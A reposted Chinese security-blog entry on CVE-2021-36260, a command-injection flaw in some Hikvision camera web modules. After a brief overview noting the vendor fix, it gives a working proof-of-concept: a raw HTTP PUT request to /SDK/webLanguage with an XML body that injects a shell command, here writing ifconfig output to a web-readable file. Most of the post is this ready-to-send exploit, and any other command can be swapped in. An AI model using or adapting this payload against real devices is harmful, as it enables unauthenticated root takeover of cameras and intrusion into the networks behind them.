海康威视代码执行漏洞

admin 2023年2月17日00:32:29评论579 views字数 791阅读2分38秒阅读模式

0x00 漏洞概述

漏洞编号:CVE-2021-36260

细节:海康威视部分产品中的web模块存在一个命令注入漏洞,由于对输入参数校验不充分,攻击者利用该漏洞可以用无限制的root shell来完全控制设备,即使设备的所有者受限于有限的受保护shell(psh)。除了入侵IP摄像头外,还可以访问和攻击内部网络。该漏洞的利用并不需要用户交互,攻击者只需要访问httpHTTPS服务器端口(80/443)即可利用该漏洞,无需用户名、密码、以及其他操作。摄像头本身也不会检测到任何登录信息。

海康威视已发布版本修复该漏洞。



0x01 正文

海康威视登录页面

海康威视代码执行漏洞

漏洞PoC:

PUT /SDK/webLanguage HTTP/1.1Host: User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2Accept-Encoding: gzip, deflateConnection: closeCookie: language=zhUpgrade-Insecure-Requests: 1Content-Length: 102
<?xml version='1.0'encoding='UTF-8'?> <language> $(ifconfig -a > webLib/x.asp) </language>

成功执行命令:

海康威视代码执行漏洞



- End -

原文始发于微信公众号(NS Demon团队):海康威视代码执行漏洞

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2023年2月17日00:32:29
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   海康威视代码执行漏洞https://cn-sec.com/archives/1274645.html

发表评论

匿名网友 填写信息